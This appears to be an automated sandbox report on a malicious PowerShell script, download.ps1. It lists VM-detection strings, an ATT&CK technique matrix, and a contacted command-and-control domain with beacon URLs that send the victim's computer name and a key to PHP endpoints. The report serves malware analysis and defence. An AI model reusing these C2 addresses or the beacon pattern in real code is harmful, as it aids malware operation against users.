Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2223640221.000001D9CBDEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC:\Windows\tracing%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`S
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2223640221.000001D9CBEBA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`S
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://jjdgdeffjimfgne.top0%Avira URL Cloudsafe
http://$n57epo4a2v6u0zx/$xme7jrzn1ow6thf.php?id=$env:computername&key=$pagxhc&s=5270%Avira URL Cloudsafe
https://0.google.com/0%Avira URL Cloudsafe
http://crl.microsoftF0%Avira URL Cloudsafe
https://0.google0%Avira URL Cloudsafe
http://jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=5270%Avira URL Cloudsafe
http://0.google.com/0%Avira URL Cloudsafe
http://0.google.0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jjdgdeffjimfgne.top
45.61.136.138
truetrue
    		unknown
    www.google.com
    		142.250.184.228
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527true
      • Avira URL Cloud: safe
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://jjdgdeffjimfgne.toppowershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schema.org/WebPagepowershell.exe, 00000000.00000002.2182558071.000001D9B61A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B6194000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B619D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B6199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B0000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://0.google.com/powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.google.compowershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://apis.google.compowershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2182558071.000001D9B3AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://$n57epo4a2v6u0zx/$xme7jrzn1ow6thf.php?id=$env:computername&key=$pagxhc&s=527powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.microsoftFpowershell.exe, 00000000.00000002.2223453498.000001D9CBBF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://0.googlepowershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://0.google.powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://0.google.com/powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.2182558071.000001D9B3AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          45.61.136.138
                                                                                          		jjdgdeffjimfgne.topUnited States
                                                                                          		40676AS40676UStrue
                                                                                          142.250.184.228
                                                                                          		www.google.comUnited States
                                                                                          		15169GOOGLEUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1585341
                                                                                          Start date and time:2025-01-07 14:33:12 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 4m 12s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:8
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:download.ps1
                                                                                          Detection:MAL
                                                                                          Classification:mal68.evad.winPS1@2/7@2/2
                                                                                          EGA Information:Failed
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 14
                                                                                          • Number of non-executed functions: 14
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .ps1

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 5032 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: download.ps1

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          08:34:03API Interceptor43x Sleep call for process: powershell.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • bfhdkgmmhdbikgj.top/3dy4fnsuzmhtr.php?id=computer&key=40391840945&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • bfhdkgmmhdbikgj.top/gz782b5rhjhtr.php?id=computer&key=73964595488&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • bfhdkgmmhdbikgj.top/8j3zac462bhtr.php?id=user-PC&key=66957681081&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • kcehmenjdibnmni.top/sgat4cebpihtr.php?id=computer&key=24472055606&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • kcehmenjdibnmni.top/g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527

                                                                                          Domains

                                                                                          No context

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          AS40676USmiori.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                          • 206.201.59.150
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 45.61.136.138
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 45.61.136.138
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 45.61.136.138
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 45.61.136.138
                                                                                          LZUCldA1ro.exeGet hashmaliciousUnknownBrowse
                                                                                          • 207.231.107.137
                                                                                          LZUCldA1ro.exeGet hashmaliciousUnknownBrowse
                                                                                          • 207.231.107.137
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 45.61.136.138
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 45.61.136.138
                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 45.61.136.138

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
